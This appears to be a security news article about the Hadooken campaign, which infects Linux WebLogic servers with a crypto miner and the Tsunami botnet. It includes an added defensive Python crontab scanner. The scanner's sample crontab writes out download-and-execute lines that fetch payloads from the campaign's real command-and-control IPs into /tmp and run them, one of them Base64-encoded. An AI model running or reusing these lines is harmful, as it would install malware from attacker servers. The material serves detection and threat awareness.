New Malware Campaign Targets Linux Servers for Cryptocurrency Mining
Recent discoveries by cybersecurity researchers have unveiled a new malware operation specifically designed to target Linux environments for illicit cryptocurrency mining and the deployment of botnet malware. This campaign notably focuses on the Oracle WebLogic server, aiming to distribute a malware variant identified as Hadooken, as reported by cloud security firm Aqua.
According to security researcher Assaf Moran, the deployment of Hadooken triggers the installation of Tsunami malware, which functions as a cryptocurrency miner. The attack exploits known vulnerabilities and misconfigurations, such as weak credentials, to secure an initial foothold and execute arbitrary code in vulnerable instances.
The attack uses two nearly identical payloads, one written in Python and the other as a shell script. Both retrieve the Hadooken malware from remote servers (identified by the IP addresses 89.185.85[.]102 and 185.174.136[.]204). The shell script version additionally harvests data from directories holding SSH material, such as user credentials and known-host information, and then uses it to attack servers already known to the compromised host.
The malware moves laterally across the network or interconnected environments to spread the Hadooken strain further. Hadooken embeds two principal components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet known as Tsunami, previously associated with attacks on Jenkins and WebLogic services within Kubernetes clusters.
Furthermore, Hadooken ensures persistence on the host system by establishing cron jobs that regularly execute the crypto miner at varying intervals. Its evasion tactics include the use of Base64-encoded payloads, renaming payloads to common process names like "bash" and "java" to blend with legitimate software, and deleting artifacts post-execution to obscure any trace of malicious activity.
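The persistence and evasion traits described above (cron-based re-execution, Base64-encoded payloads, binaries renamed to "bash" or "java") are also what a defender can hunt for in crontabs. The following added example is not from the article or from Aqua's report: the detection heuristics are my own, the crontab lines are constructed, and the only values taken from the page are the two IP addresses it names.

```python
import base64
import re

# The two download/C2 addresses the article names (defanged there with "[.]").
KNOWN_C2 = {"89.185.85.102", "185.174.136.204"}
B64_EXEC = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")
DOWNLOAD = re.compile(r"\b(?:curl|wget)\b[^|;]*?(\d{1,3}(?:\.\d{1,3}){3})")
MASQ = re.compile(r"/(?:tmp|var/tmp|dev/shm)/(?:bash|java|sh)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DECODED_HINTS = re.compile(r"curl|wget|chmod|/tmp/")

def flag_cron_line(line):
    """Return the reasons one crontab line resembles Hadooken-style persistence."""
    reasons = []
    cmd = line.strip()
    if not cmd or cmd.startswith("#"):
        return reasons
    if B64_EXEC.search(cmd):
        reasons.append("base64-decoded payload piped into a shell")
    m = DOWNLOAD.search(cmd)
    if m:
        tag = "known C2" if m.group(1) in KNOWN_C2 else "raw IP"
        reasons.append(f"download from {tag} {m.group(1)}")
    m = MASQ.search(cmd)
    if m:
        reasons.append(f"payload staged under a common binary name: {m.group(0)}")
    # Decode inline Base64 blobs and look for fetch/exec commands hidden inside.
    for blob in B64_BLOB.findall(cmd):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:
            continue
        if DECODED_HINTS.search(decoded):
            reasons.append("embedded Base64 decodes to fetch/exec commands")
            break
    return reasons

def scan_crontab(text):
    """Return (line_number, reasons) for each suspicious line of a crontab dump."""
    numbered = enumerate(text.splitlines(), start=1)
    return [(n, r) for n, r in ((n, flag_cron_line(l)) for n, l in numbered) if r]

# Constructed sample crontab (not a real capture). The stager is Base64-encoded
# here to mirror the article's description of encoded payloads fetching a "bash".
_STAGER = base64.b64encode(b"curl -s http://89.185.85.102/bash -o /tmp/bash").decode()
SAMPLE_CRONTAB = f"""0 2 * * * /usr/bin/certwatch --renew
*/17 * * * * echo {_STAGER} | base64 -d | bash
*/5 * * * * wget -q http://185.174.136.204/java -O /tmp/java && /tmp/java
"""
```

Run `scan_crontab` over `crontab -l` output or the files under /etc/cron.d and /var/spool/cron; the benign first sample line produces no findings, while the two staged lines are each flagged for more than one reason.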
Aqua’s analysis indicates that the IP address associated with one of the key command-and-control servers (89.185.85[.]102) is registered in Germany under Aeza International LTD, a provider with previous ties to cryptocurrency campaigns exploiting vulnerabilities within Apache Log4j and Atlassian Confluence. The second IP, 185.174.136[.]204, though currently inactive, is similarly linked to Aeza Group Ltd. Reports suggest that Aeza operates in volatile areas such as Moscow while providing services typically favored by cybercriminals for their robustness against law enforcement.
The modus operandi employed by Aeza and its rapid expansion can be attributed to the engagement of young developers linked to bulletproof hosting providers in Russia, who facilitate a safe harbor for cybercriminal activities.
Businesses running Linux environments, particularly those operating Oracle WebLogic servers, should implement robust security measures against attacks of this kind. Relevant MITRE ATT&CK tactics for this incident include initial access through exploitation of known vulnerabilities, lateral movement across the network, and persistence via scheduled tasks.
Keeping abreast of such threats is imperative for business owners dedicated to safeguarding their digital infrastructures. Regular assessments of system configurations and user credential policies can substantially reduce the risk of compromise.
Source: https://thehackernews.com/2024/09/new-linux-malware-campaign-exploits.html